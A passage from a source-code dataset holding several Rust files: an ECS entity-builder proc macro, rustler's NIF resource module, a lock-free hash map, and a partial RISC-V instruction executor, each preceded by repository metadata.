PbAuthUserRevokeRoleResponse, AuthenticateResponse as PbAuthenticateResponse, CompactionResponse as PbCompactionResponse, Compare as PbCompare, DefragmentResponse as PbDefragmentResponse, DeleteRangeResponse as PbDeleteResponse, HashKvResponse as PbHashKvResponse, HashResponse as PbHashResponse, LeaseGrantResponse as PbLeaseGrantResponse, LeaseKeepAliveResponse as PbLeaseKeepAliveResponse, LeaseLeasesResponse as PbLeaseLeasesResponse, LeaseRevokeResponse as PbLeaseRevokeResponse, LeaseStatus as PbLeaseStatus, LeaseTimeToLiveResponse as PbLeaseTimeToLiveResponse, Member as PbMember, MemberAddResponse as PbMemberAddResponse, MemberListResponse as PbMemberListResponse, MemberPromoteResponse as PbMemberPromoteResponse, MemberRemoveResponse as PbMemberRemoveResponse, MemberUpdateResponse as PbMemberUpdateResponse, MoveLeaderResponse as PbMoveLeaderResponse, PutResponse as PbPutResponse, RangeResponse as PbRangeResponse, ResponseHeader as PbResponseHeader, SnapshotResponse as PbSnapshotResponse, StatusResponse as PbStatusResponse, TxnResponse as PbTxnResponse, WatchResponse as PbWatchResponse, }; pub use crate::rpc::pb::mvccpb::Event as PbEvent; pub use crate::rpc::pb::mvccpb::KeyValue as PbKeyValue; pub use crate::rpc::pb::v3electionpb::{ CampaignResponse as PbCampaignResponse, LeaderKey as PbLeaderKey, LeaderResponse as PbLeaderResponse, ProclaimResponse as PbProclaimResponse, ResignResponse as PbResignResponse, }; pub use crate::rpc::pb::v3lockpb::{ LockResponse as PbLockResponse, UnlockResponse as PbUnlockResponse, }; }
true
c183f30ed722617a356c78c129b68c49e4f2ac82
Rust
Dherse/secs
/codegen/src/entity.rs
UTF-8
2,183
2.71875
3
[]
no_license
use proc_macro2::TokenStream;

use crate::{component::Component, ecs::ECS, GenericOutput};

pub(crate) fn make_entity_builder(
    main: &ECS,
    components: &[Component],
    generics: &GenericOutput,
) -> TokenStream {
    let name = main.as_entity_builder_ident();

    let fields = components.iter().map(|comp| {
        let name = comp.as_ident();
        let ty = comp.as_ty();

        quote::quote! {
            #name: Option<#ty>
        }
    });

    let fields_default = components.iter().map(|comp| {
        let name = comp.as_ident();

        quote::quote! {
            #name: None
        }
    });

    let setters_fn = components.iter().map(|comp| {
        let name = comp.as_ident();
        let name_add = comp.as_add_ident();
        let name_del = comp.as_del_ident();
        let ty = comp.as_ty();

        let doc_str = format!(
            "Adds the component '{}' of type [`{}`] to the entity",
            comp.name, comp.path
        );

        let doc_del = format!(
            "Removes the component '{}' of type [`{}`] from the entity",
            comp.name, comp.path
        );

        quote::quote! {
            #[doc = #doc_str]
            pub fn #name(mut self, value: #ty) -> Self {
                self.#name = Some(value);
                self
            }

            #[doc = #doc_str]
            pub fn #name_add(&mut self, value: #ty) -> &mut Self {
                self.#name = Some(value);
                self
            }

            #[doc = #doc_del]
            pub fn #name_del(&mut self) -> &mut Self {
                self.#name = None;
                self
            }
        }
    });

    let component_generics = &generics.components;

    quote::quote! {
        pub struct #name#component_generics {
            entity: ::secs::Entity,
            #(#fields,)*
        }

        impl#component_generics #name#component_generics {
            fn new(entity: ::secs::Entity) -> Self {
                Self {
                    entity,
                    #(#fields_default,)*
                }
            }

            pub fn entity(&self) -> ::secs::Entity {
                self.entity
            }

            #(#setters_fn)*
        }
    }
}
true
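A hand-written analogue of the builder this macro generates, with plain stand-in types (the Entity and Position below are illustrative, not the secs crate's types), to show the shape of the emitted code:

// Hand-written analogue of the generated builder; types are stand-ins.
#[derive(Clone, Copy, Debug)]
struct Entity(u32);

#[derive(Clone, Copy, Debug)]
struct Position { x: f32, y: f32 }

struct EntityBuilder {
    entity: Entity,
    position: Option<Position>,
}

impl EntityBuilder {
    fn new(entity: Entity) -> Self {
        Self { entity, position: None }
    }

    /// Adds the 'position' component to the entity (consuming, chainable form).
    fn position(mut self, value: Position) -> Self {
        self.position = Some(value);
        self
    }

    /// Removes the 'position' component from the entity.
    fn position_del(&mut self) -> &mut Self {
        self.position = None;
        self
    }
}

fn main() {
    let mut b = EntityBuilder::new(Entity(1)).position(Position { x: 0.0, y: 1.0 });
    println!("{:?} has position {:?}", b.entity, b.position);
    b.position_del();
    assert!(b.position.is_none());
}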
a666beb63614eb5764e64f411973b9f07e541bb3
Rust
rusterlium/rustler
/rustler/src/resource.rs
UTF-8
9,922
3.1875
3
[ "MIT", "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
//! Support for storing Rust data in Erlang terms. //! //! A NIF resource allows you to safely store Rust structs in a term, and therefore keep it across //! NIF calls. The struct will be automatically dropped when the BEAM GC decides that there are no //! more references to the resource. use std::marker::PhantomData; use std::mem; use std::ops::Deref; use std::ptr; use super::{Binary, Decoder, Encoder, Env, Error, NifResult, Term}; use crate::wrapper::{ c_void, resource, NifResourceFlags, MUTABLE_NIF_RESOURCE_HANDLE, NIF_ENV, NIF_RESOURCE_TYPE, }; /// Re-export a type used by the `resource!` macro. #[doc(hidden)] pub use crate::wrapper::NIF_RESOURCE_FLAGS; /// The ResourceType struct contains a NIF_RESOURCE_TYPE and a phantom reference to the type it /// is for. It serves as a holder for the information needed to interact with the Erlang VM about /// the resource type. /// /// This is usually stored in an implementation of ResourceTypeProvider. #[doc(hidden)] pub struct ResourceType<T> { pub res: NIF_RESOURCE_TYPE, pub struct_type: PhantomData<T>, } /// This trait gets implemented for the type we want to put into a resource when /// resource! is called on it. It provides the ResourceType. /// /// In most cases the user should not have to worry about this. #[doc(hidden)] pub trait ResourceTypeProvider: Sized + Send + Sync + 'static { fn get_type() -> &'static ResourceType<Self>; } impl<T> Encoder for ResourceArc<T> where T: ResourceTypeProvider, { fn encode<'a>(&self, env: Env<'a>) -> Term<'a> { self.as_term(env) } } impl<'a, T> Decoder<'a> for ResourceArc<T> where T: ResourceTypeProvider + 'a, { fn decode(term: Term<'a>) -> NifResult<Self> { ResourceArc::from_term(term) } } /// Drop a T that lives in an Erlang resource. (erlang_nif-sys requires us to declare this /// function safe, but it is of course thoroughly unsafe!) extern "C" fn resource_destructor<T>(_env: NIF_ENV, handle: MUTABLE_NIF_RESOURCE_HANDLE) { unsafe { let aligned = align_alloced_mem_for_struct::<T>(handle); let res = aligned as *mut T; ptr::read(res); } } /// This is the function that gets called from resource! in on_load to create a new /// resource type. /// /// # Panics /// /// Panics if `name` isn't null-terminated. #[doc(hidden)] pub fn open_struct_resource_type<T: ResourceTypeProvider>( env: Env, name: &str, flags: NifResourceFlags, ) -> Option<ResourceType<T>> { let res: Option<NIF_RESOURCE_TYPE> = unsafe { resource::open_resource_type( env.as_c_arg(), name.as_bytes(), Some(resource_destructor::<T>), flags, ) }; res.map(|r| ResourceType { res: r, struct_type: PhantomData, }) } fn get_alloc_size_struct<T>() -> usize { mem::size_of::<T>() + mem::align_of::<T>() } /// Given a pointer `ptr` to an allocation of `get_alloc_size_struct::<T>()` bytes, return the /// first aligned pointer within the allocation where a `T` may be stored. /// Unsafe: `ptr` must point to a large enough allocation and not be null. unsafe fn align_alloced_mem_for_struct<T>(ptr: *const c_void) -> *const c_void { let offset = mem::align_of::<T>() - ((ptr as usize) % mem::align_of::<T>()); ptr.add(offset) } /// A reference to a resource of type `T`. /// /// This type is like `std::sync::Arc`: it provides thread-safe, reference-counted storage for Rust /// data that can be shared across threads. Data stored this way is immutable by default. If you /// need to modify data in a resource, use a `std::sync::Mutex` or `RwLock`. /// /// Rust code and Erlang code can both have references to the same resource at the same time. 
Rust /// code uses `ResourceArc`; in Erlang, a reference to a resource is a kind of term. You can /// convert back and forth between the two using `Encoder` and `Decoder`. pub struct ResourceArc<T> where T: ResourceTypeProvider, { raw: *const c_void, inner: *mut T, } // Safe because T is `Sync` and `Send`. unsafe impl<T> Send for ResourceArc<T> where T: ResourceTypeProvider {} unsafe impl<T> Sync for ResourceArc<T> where T: ResourceTypeProvider {} impl<T> ResourceArc<T> where T: ResourceTypeProvider, { /// Makes a new ResourceArc from the given type. Note that the type must have /// ResourceTypeProvider implemented for it. See module documentation for info on this. pub fn new(data: T) -> Self { let alloc_size = get_alloc_size_struct::<T>(); let mem_raw = unsafe { resource::alloc_resource(T::get_type().res, alloc_size) }; let aligned_mem = unsafe { align_alloced_mem_for_struct::<T>(mem_raw) as *mut T }; unsafe { ptr::write(aligned_mem, data) }; ResourceArc { raw: mem_raw, inner: aligned_mem, } } /// Make a resource binary associated with the given resource /// /// The closure `f` is called with the referenced object and must return a slice with the same /// lifetime as the object. This means that the slice either has to be derived directly from /// the instance or that it has to have static lifetime. pub fn make_binary<'env, 'a, F>(&self, env: Env<'env>, f: F) -> Binary<'env> where F: FnOnce(&'a T) -> &'a [u8], { // This call is safe because `f` can only return a slice that lives at least as long as // the given instance of `T`. unsafe { self.make_binary_unsafe(env, f) } } /// Make a resource binary without strict lifetime checking /// /// The user *must* ensure that the lifetime of the returned slice is at least as long as the /// lifetime of the referenced instance. /// /// # Safety /// /// This function is only safe if the slice that is returned from the closure is guaranteed to /// live at least as long as the `ResourceArc` instance. If in doubt, use the safe version /// `ResourceArc::make_binary` which enforces this bound through its signature. pub unsafe fn make_binary_unsafe<'env, 'a, 'b, F>(&self, env: Env<'env>, f: F) -> Binary<'env> where F: FnOnce(&'a T) -> &'b [u8], { let bin = f(&*self.inner); let binary = rustler_sys::enif_make_resource_binary( env.as_c_arg(), self.raw, bin.as_ptr() as *const c_void, bin.len(), ); let term = Term::new(env, binary); Binary::from_term_and_slice(term, bin) } fn from_term(term: Term) -> Result<Self, Error> { let res_resource = match unsafe { resource::get_resource( term.get_env().as_c_arg(), term.as_c_arg(), T::get_type().res, ) } { Some(res) => res, None => return Err(Error::BadArg), }; unsafe { resource::keep_resource(res_resource); } let casted_ptr = unsafe { align_alloced_mem_for_struct::<T>(res_resource) as *mut T }; Ok(ResourceArc { raw: res_resource, inner: casted_ptr, }) } fn as_term<'a>(&self, env: Env<'a>) -> Term<'a> { unsafe { Term::new(env, resource::make_resource(env.as_c_arg(), self.raw)) } } fn as_c_arg(&mut self) -> *const c_void { self.raw } fn inner(&self) -> &T { unsafe { &*self.inner } } } impl<T> Deref for ResourceArc<T> where T: ResourceTypeProvider, { type Target = T; fn deref(&self) -> &T { self.inner() } } impl<T> Clone for ResourceArc<T> where T: ResourceTypeProvider, { /// Cloning a `ResourceArc` simply increments the reference count for the /// resource. The `T` value is not cloned. 
fn clone(&self) -> Self { unsafe { resource::keep_resource(self.raw); } ResourceArc { raw: self.raw, inner: self.inner, } } } impl<T> Drop for ResourceArc<T> where T: ResourceTypeProvider, { /// When a `ResourceArc` is dropped, the reference count is decremented. If /// there are no other references to the resource, the `T` value is dropped. /// /// However, note that in general, the Rust value in a resource is dropped /// at an unpredictable time: whenever the VM decides to do garbage /// collection. fn drop(&mut self) { unsafe { rustler_sys::enif_release_resource(self.as_c_arg()) }; } } #[macro_export] #[deprecated(since = "0.22.0", note = "Please use `resource!` instead.")] macro_rules! resource_struct_init { ($struct_name:ty, $env: ident) => { $crate::resource!($struct_name, $env) }; } #[macro_export] macro_rules! resource { ($struct_name:ty, $env: ident) => { { static mut STRUCT_TYPE: Option<$crate::resource::ResourceType<$struct_name>> = None; let temp_struct_type = match $crate::resource::open_struct_resource_type::<$struct_name>( $env, concat!(stringify!($struct_name), "\x00"), $crate::resource::NIF_RESOURCE_FLAGS::ERL_NIF_RT_CREATE ) { Some(inner) => inner, None => { println!("Failure in creating resource type"); return false; } }; unsafe { STRUCT_TYPE = Some(temp_struct_type) }; impl $crate::resource::ResourceTypeProvider for $struct_name { fn get_type() -> &'static $crate::resource::ResourceType<Self> { unsafe { &STRUCT_TYPE }.as_ref() .expect("The resource type hasn't been initialized. Did you remember to call the function where you used the `resource!` macro?") } } } } }
true
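A sketch of how the pieces above fit together in a NIF module, assuming rustler's attribute-macro API (0.22+); the module and function names are illustrative, not part of the crate. A Mutex-guarded struct is registered with resource! and shared across calls via ResourceArc:

use std::sync::Mutex;
use rustler::{Env, ResourceArc, Term};

// The Rust payload; interior mutability via Mutex, since resource data is shared immutably.
struct Counter {
    value: Mutex<i64>,
}

fn load(env: Env, _info: Term) -> bool {
    // Register the resource type once, when the NIF library is loaded.
    rustler::resource!(Counter, env);
    true
}

#[rustler::nif]
fn new_counter() -> ResourceArc<Counter> {
    ResourceArc::new(Counter { value: Mutex::new(0) })
}

#[rustler::nif]
fn increment(counter: ResourceArc<Counter>) -> i64 {
    let mut v = counter.value.lock().unwrap();
    *v += 1;
    *v
}

rustler::init!("Elixir.Counter", [new_counter, increment], load = load);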
ee8c490a49a4839349561cbb12d2d35de05a76f1
Rust
Kryndex/tfs
/atomic-hashmap/src/lib.rs
UTF-8
2,071
3.125
3
[ "MIT" ]
permissive
//! Implementation of a lock-free, atomic hash table.
//!
//! This crate provides a high-performance implementation of a completely lock-free (no mutexes, no
//! spin-locks, or the like) hash table.
//!
//! The only instruction we use is CAS, which allows us to atomically update the table.
//!
//! # Design
//!
//! The design is similar to Feldman's lock-free hash table, but diverges on several key points.
//!
//! It is structured as a 256-radix tree with a pseudorandom permutation applied to the key.
//! Contrary to open addressing, this approach is entirely lock-free and needs no reallocation.
//!
//! The permutation is a simple table+XOR based length-padded function, which is applied to avoid
//! excessive depth (this is what makes it a "hash table").

extern crate crossbeam;

mod sponge;
mod table;

use std::hash::Hash;

use crossbeam::mem::epoch::{self, Atomic};

use sponge::Sponge;

pub struct HashMap<K, V> {
    table: table::Table<K, V>,
}

impl<K: Hash + Eq, V> HashMap<K, V> {
    pub fn insert(&self, key: K, val: V) -> Option<epoch::Pinned<V>> {
        let guard = epoch::pin();
        // Compute the sponge before `key` is moved into the pair.
        let sponge = Sponge::new(&key);
        self.table.insert(table::Pair {
            key: key,
            val: val,
        }, sponge, guard).into_pinned(guard)
    }

    pub fn remove(&self, key: K, sponge: Sponge) -> Option<epoch::Pinned<V>> {
        let guard = epoch::pin();
        // Use the sponge handed in by the caller rather than rehashing the key.
        self.table.remove(key, sponge, guard).into_pinned(guard)
    }

    pub fn for_each<F: Fn(K, V)>(&self, f: F) {
        let guard = epoch::pin();
        self.table.for_each(f, guard);
    }

    pub fn take_each<F: Fn(K, V)>(&self, f: F) {
        let guard = epoch::pin();
        self.table.take_each(f, guard);
    }

    pub fn clear(&self) {
        // `take_each` expects a closure over both key and value.
        self.take_each(|_, _| ());
    }
}

impl<'a, K: Hash + Eq, V> Into<std::collections::HashMap<K, V>> for &'a HashMap<K, V> {
    fn into(self) -> std::collections::HashMap<K, V> {
        let mut hm = std::collections::HashMap::new();
        self.for_each(|key, val| {
            hm.insert(key, val);
        });
        hm
    }
}
true
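The design notes above lean entirely on compare-and-swap. As a minimal, self-contained illustration of that primitive (standard library only, not the crate's epoch-based internals), here is a single atomic slot updated with compare_exchange in a retry loop:

use std::sync::atomic::{AtomicU64, Ordering};

/// One slot updated purely with CAS: retry until our update wins the race.
fn bump(slot: &AtomicU64) -> u64 {
    let mut current = slot.load(Ordering::Acquire);
    loop {
        let next = current + 1;
        match slot.compare_exchange(current, next, Ordering::AcqRel, Ordering::Acquire) {
            Ok(_) => return next,
            // Someone else won the race; `observed` is the fresh value, try again.
            Err(observed) => current = observed,
        }
    }
}

fn main() {
    let slot = AtomicU64::new(0);
    assert_eq!(bump(&slot), 1);
    assert_eq!(bump(&slot), 2);
}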
03278843363ed80b2fd6f9c45e019135710c38d6
Rust
luojia65/emu6
/libemu6/src/riscv/exec.rs
UTF-8
20,800
2.5625
3
[]
no_license
use super::fetch::*; use super::imm::{Imm, Uimm}; use super::regfile::{Csr, XReg, FReg}; use super::*; use crate::error::Result; use crate::mem64::Physical; use crate::size::{Isize, Usize}; use thiserror::Error; #[derive(Error, Clone, Debug)] pub enum ExecError { #[error("extension is not supported")] ExtensionNotSupported, } fn pc_to_mem_addr(pc: Usize) -> u64 { match pc { Usize::U32(a) => a as u64, Usize::U64(a) => a, } } pub struct Execute<'a> { data_mem: &'a mut Physical<'a>, x: Box<XReg>, f: Box<FReg>, csr: Box<Csr>, xlen: Xlen, } impl<'a> core::fmt::Debug for Execute<'a> { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { f.debug_struct("Execute") .field("x", &self.x) .field("xlen", &self.xlen) .finish() } } impl<'a> Execute<'a> { pub fn new(data_mem: &'a mut Physical<'a>, xlen: Xlen) -> Execute<'a> { Execute { data_mem, x: Box::new(XReg::new_zeroed(xlen)), f: Box::new(FReg::new_zeroed()), csr: Box::new(Csr::new(xlen)), xlen, } } // returns next PC value #[rustfmt::skip] pub fn execute(&mut self, ins: Instruction, pc: Usize) -> Result<Usize> { let xlen = self.xlen; let next_pc = match ins { Instruction::RV32I(ins) => exec_rv32i( ins, &mut self.x, &mut self.data_mem, pc, |imm| imm.sext(xlen), )?, Instruction::RV64I(ins) => { exec_rv64i( ins, &mut self.x, &mut self.data_mem, |imm| imm.sext(xlen), || xlen == Xlen::X64 || xlen == Xlen::X128, )?; pc + 4 }, Instruction::RVZicsr(ins) => { exec_rvzicsr( ins, &mut self.x, &mut self.csr, |uimm| uimm.zext(xlen) )?; pc + 4 }, Instruction::RVC(ins) => exec_rvc( ins, &mut self.x, &mut self.data_mem, pc, |imm| imm.sext(xlen), |uimm| uimm.zext(xlen), || xlen == Xlen::X64 || xlen == Xlen::X128, || xlen == Xlen::X128, || true, // todo: read from CSR || true // todo: read from CSR )?, Instruction::RVF(_ins) => todo!() }; Ok(next_pc) } } fn shamt32(imm: Imm) -> u32 { imm.low_u32() & 0b11111 } fn shamt32r(data: Usize) -> u32 { data.low_u32() & 0b11111 } fn exec_rv32i<'a, SEXT: Fn(Imm) -> Isize>( ins: RV32I, x: &mut XReg, data_mem: &mut Physical<'a>, pc: Usize, sext: SEXT, ) -> Result<Usize> { use RV32I::*; let mut next_pc = pc + 4; match ins { Lui(u) => x.w_isize(u.rd, sext(u.imm)), Auipc(u) => x.w_usize(u.rd, pc + sext(u.imm)), Jal(j) => { x.w_usize(j.rd, next_pc); next_pc = pc + sext(j.imm); } Jalr(i) => { x.w_usize(i.rd, next_pc); next_pc = x.r_usize(i.rs1) + sext(i.imm); } Beq(b) => { if x.r_usize(b.rs1) == x.r_usize(b.rs2) { next_pc = pc + sext(b.imm) } } Bne(b) => { if x.r_usize(b.rs1) != x.r_usize(b.rs2) { next_pc = pc + sext(b.imm) } } Blt(b) => { if x.r_isize(b.rs1) < x.r_isize(b.rs2) { next_pc = pc + sext(b.imm) } } Bge(b) => { if x.r_isize(b.rs1) >= x.r_isize(b.rs2) { next_pc = pc + sext(b.imm) } } Bltu(b) => { if x.r_usize(b.rs1) < x.r_usize(b.rs2) { next_pc = pc + sext(b.imm) } } Bgeu(b) => { if x.r_usize(b.rs1) >= x.r_usize(b.rs2) { next_pc = pc + sext(b.imm) } } Lb(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_i8(addr)?; x.w_sext8(i.rd, data); } Lh(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_i16(addr)?; x.w_sext16(i.rd, data); } Lw(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_i32(addr)?; x.w_sext32(i.rd, data); } Lbu(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_u8(addr)?; x.w_zext8(i.rd, data); } Lhu(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_u16(addr)?; x.w_zext16(i.rd, data); } Sb(s) 
=> data_mem.write_u8( pc_to_mem_addr(x.r_usize(s.rs1) + sext(s.imm)), x.r_u8(s.rs2), )?, Sh(s) => data_mem.write_u16( pc_to_mem_addr(x.r_usize(s.rs1) + sext(s.imm)), x.r_u16(s.rs2), )?, Sw(s) => data_mem.write_u32( pc_to_mem_addr(x.r_usize(s.rs1) + sext(s.imm)), x.r_u32(s.rs2), )?, Addi(i) => x.w_usize(i.rd, x.r_usize(i.rs1) + sext(i.imm)), Slti(i) => { let value = if x.r_isize(i.rs1) < sext(i.imm) { 1 } else { 0 }; x.w_zext8(i.rd, value); } Sltiu(i) => { let value = if x.r_usize(i.rs1) < sext(i.imm).cast_to_usize() { 1 } else { 0 }; x.w_zext8(i.rd, value); } Ori(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) | sext(i.imm)); } Andi(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) & sext(i.imm)); } Xori(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) ^ sext(i.imm)); } Slli(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) << shamt32(i.imm)); } Srli(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) >> shamt32(i.imm)); } Srai(i) => { x.w_isize(i.rd, x.r_isize(i.rs1) >> shamt32(i.imm)); } Add(r) => x.w_usize(r.rd, x.r_usize(r.rs1) + x.r_usize(r.rs2)), Sub(r) => x.w_usize(r.rd, x.r_usize(r.rs1) - x.r_usize(r.rs2)), Sll(r) => { let shamt = shamt32r(x.r_usize(r.rs2)); x.w_usize(r.rd, x.r_usize(r.rs1) << shamt); } Slt(r) => { let value = if x.r_isize(r.rs1) < x.r_isize(r.rs2) { 1 } else { 0 }; x.w_sext8(r.rd, value); } Sltu(r) => { let value = if x.r_usize(r.rs1) < x.r_usize(r.rs2) { 1 } else { 0 }; x.w_sext8(r.rd, value); } Xor(r) => { x.w_usize(r.rd, x.r_usize(r.rs1) ^ x.r_usize(r.rs2)); } Srl(r) => { let shamt = shamt32r(x.r_usize(r.rs2)); x.w_usize(r.rd, x.r_usize(r.rs1) >> shamt); } Sra(r) => { let shamt = shamt32r(x.r_usize(r.rs2)); x.w_isize(r.rd, x.r_isize(r.rs1) >> shamt); } Or(r) => { x.w_usize(r.rd, x.r_usize(r.rs1) | x.r_usize(r.rs2)); } And(r) => { x.w_usize(r.rd, x.r_usize(r.rs1) & x.r_usize(r.rs2)); } Fence(_) => todo!(), Ecall(_) => todo!(), Ebreak(_) => todo!("ebreak"), } Ok(next_pc) } fn shamt64(imm: Imm) -> u32 { imm.low_u32() & 0b111111 } fn shamt64r(data: Usize) -> u32 { data.low_u32() & 0b111111 } fn exec_rv64i<'a, SEXT: Fn(Imm) -> Isize, X64: Fn() -> bool>( ins: RV64I, x: &mut XReg, data_mem: &mut Physical<'a>, sext: SEXT, has_x64: X64, ) -> Result<()> { if !has_x64() { return Err(ExecError::ExtensionNotSupported)?; } use RV64I::*; match ins { Lwu(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_u32(addr)?; x.w_zext32(i.rd, data); } Ld(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_i64(addr)?; x.w_sext64(i.rd, data); } Sd(s) => data_mem.write_u64( pc_to_mem_addr(x.r_usize(s.rs1) + sext(s.imm)), x.r_u64(s.rs2), )?, Slli(i) => x.w_usize(i.rd, x.r_usize(i.rs1) << shamt64(i.imm)), Srli(i) => x.w_usize(i.rd, x.r_usize(i.rs1) >> shamt64(i.imm)), Srai(i) => x.w_isize(i.rd, x.r_isize(i.rs1) >> shamt64(i.imm)), Sll(r) => { let shamt = shamt64r(x.r_usize(r.rs2)); x.w_usize(r.rd, x.r_usize(r.rs1) << shamt); } Srl(r) => { let shamt = shamt64r(x.r_usize(r.rs2)); x.w_usize(r.rd, x.r_usize(r.rs1) >> shamt); } Sra(r) => { let shamt = shamt64r(x.r_usize(r.rs2)); x.w_isize(r.rd, x.r_isize(r.rs1) >> shamt); } Addiw(i) => x.w_sext32(i.rd, x.r_i32(i.rs1).wrapping_add(i.imm.low_i32())), Slliw(i) => { let val = x.r_i32(i.rs1).checked_shl(shamt32(i.imm)).unwrap_or(0); x.w_sext32(i.rd, val) } Srliw(i) => { let val = x.r_u32(i.rs1).checked_shr(shamt32(i.imm)).unwrap_or(0); x.w_sext32(i.rd, i32::from_ne_bytes(val.to_be_bytes())) } Sraiw(i) => { let val = x.r_i32(i.rs1).checked_shr(shamt32(i.imm)).unwrap_or(0); x.w_sext32(i.rd, val) } Addw(r) => 
x.w_sext32(r.rd, x.r_i32(r.rs1).wrapping_add(x.r_i32(r.rs2))), Subw(r) => x.w_sext32(r.rd, x.r_i32(r.rs1).wrapping_sub(x.r_i32(r.rs2))), Sllw(r) => { let val = x .r_i32(r.rs1) .checked_shl(shamt32r(x.r_usize(r.rs2))) .unwrap_or(0); x.w_sext32(r.rd, val) } Srlw(r) => { let val = x .r_u32(r.rs1) .checked_shr(shamt32r(x.r_usize(r.rs2))) .unwrap_or(0); x.w_sext32(r.rd, i32::from_ne_bytes(val.to_be_bytes())) } Sraw(r) => { let val = x .r_i32(r.rs1) .checked_shr(shamt32r(x.r_usize(r.rs2))) .unwrap_or(0); x.w_sext32(r.rd, val) } } Ok(()) } fn exec_rvzicsr<ZEXT: Fn(Uimm) -> Usize>( ins: RVZicsr, x: &mut XReg, csr: &mut Csr, zext: ZEXT, ) -> Result<()> { use RVZicsr::*; // if r.rd!=0 or r.rs1 != 0 => prevent side effects match ins { Csrrw(r) => { if r.rd != 0 { x.w_usize(r.rd, csr.r_usize(r.csr)); } csr.w_usize(r.csr, x.r_usize(r.rs1)); } Csrrs(r) => { x.w_usize(r.rd, csr.r_usize(r.csr)); if r.rs1 != 0 { csr.w_usize(r.csr, csr.r_usize(r.csr) | x.r_usize(r.rs1)); } } Csrrc(r) => { x.w_usize(r.rd, csr.r_usize(r.csr)); if r.rs1 != 0 { csr.w_usize(r.csr, csr.r_usize(r.csr) & !x.r_usize(r.rs1)); } } Csrrwi(i) => { if i.rd != 0 { x.w_usize(i.rd, csr.r_usize(i.csr)); } csr.w_usize(i.csr, zext(i.uimm)); } Csrrsi(i) => { x.w_usize(i.rd, csr.r_usize(i.csr)); if i.uimm != 0 { csr.w_usize(i.csr, csr.r_usize(i.csr) | zext(i.uimm)); } } Csrrci(i) => { x.w_usize(i.rd, csr.r_usize(i.csr)); if i.uimm != 0 { csr.w_usize(i.csr, csr.r_usize(i.csr) & !zext(i.uimm)); } } } Ok(()) } const X1_RA: u8 = 1; const X2_SP: u8 = 2; fn exec_rvc< 'a, SEXT: Fn(Imm) -> Isize, ZEXT: Fn(Uimm) -> Usize, X64: Fn() -> bool, X128: Fn() -> bool, F32: Fn() -> bool, F64: Fn() -> bool, >( ins: RVC, x: &mut XReg, data_mem: &mut Physical<'a>, pc: Usize, sext: SEXT, zext: ZEXT, has_x64: X64, has_x128: X128, has_f32: F32, has_f64: F64, ) -> Result<Usize> { let shamt_c = |imm: Imm| -> Result<u32> { if has_x128() { todo!("RV128I") } let s64 = imm.low_u32() & 0b111111; if !has_x64() && s64 >= 0b100000 { return Err(ExecError::ExtensionNotSupported)?; }; Ok(s64) }; use RVC::*; let mut next_pc = pc + 2; // if r.rd!=0 or r.rs1 != 0 => prevent side effects match ins { Caddi4spn(ciw) => x.w_usize(ciw.rd, x.r_usize(X2_SP) + zext(ciw.uimm)), Cfld(_cl) => { if has_x128() || !has_f64() { // RV32DC or RV64DC return Err(ExecError::ExtensionNotSupported)?; } todo!("D extension") }, Clq(_cl) => { if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Clw(cl) => { let addr = pc_to_mem_addr(x.r_usize(cl.rs1) + sext(cl.imm)); let data = data_mem.read_i32(addr)?; x.w_sext32(cl.rd, data); }, Cflw(_clt) => { if !has_f32() || has_x64() || has_x128() { // RV32FC return Err(ExecError::ExtensionNotSupported)?; } todo!("F extension") }, Cld(cl) => { if !has_x64() && !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } let addr = pc_to_mem_addr(x.r_usize(cl.rs1) + sext(cl.imm)); let data = data_mem.read_i64(addr)?; x.w_sext64(cl.rd, data); }, Cfsd(_cs) => { if has_x128() || !has_f64() { // RV32DC or RV64DC return Err(ExecError::ExtensionNotSupported)?; } todo!("D extension") }, Csq(_cs) => { if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Csw(cs) => data_mem.write_u32( pc_to_mem_addr(x.r_usize(cs.rs1) + sext(cs.imm)), x.r_u32(cs.rs2), )?, Cfsw(_cs) => { if !has_f32() || has_x64() || has_x128() { // RV32FC return Err(ExecError::ExtensionNotSupported)?; } todo!("F extension") }, Csd(cs) => { if !has_x64() && !has_x128() { // RV64C or RV128C return 
Err(ExecError::ExtensionNotSupported)?; } data_mem.write_u64( pc_to_mem_addr(x.r_usize(cs.rs1) + sext(cs.imm)), x.r_u64(cs.rs2), )? }, Cnop(_) => { /* nop */ }, Caddi(ci) => { x.w_usize(ci.rdrs1, x.r_usize(ci.rdrs1) + sext(ci.imm)) }, Cjal(cj) => { if has_x64() || has_x128() { // RV32C return Err(ExecError::ExtensionNotSupported)?; } x.w_usize(X1_RA, next_pc); next_pc = pc + sext(cj.target); }, Caddiw(ci) => { if !has_x64() && !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } x.w_sext32(ci.rdrs1, x.r_i32(ci.rdrs1).wrapping_add(ci.imm.low_i32())) }, Cli(ci) => { x.w_isize(ci.rdrs1, sext(ci.imm)) }, Caddi16sp(ci) => { x.w_usize(X2_SP, x.r_usize(X2_SP) + sext(ci.imm)) }, Clui(ci) => { x.w_isize(ci.rdrs1, sext(ci.imm)) }, Csrli(ci) => { x.w_usize(ci.rdrs1, x.r_usize(ci.rdrs1) >> shamt_c(ci.imm)?); }, Csrli64(_ci) => { // c.srlid? if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Csrai(ci) => { x.w_isize(ci.rdrs1, 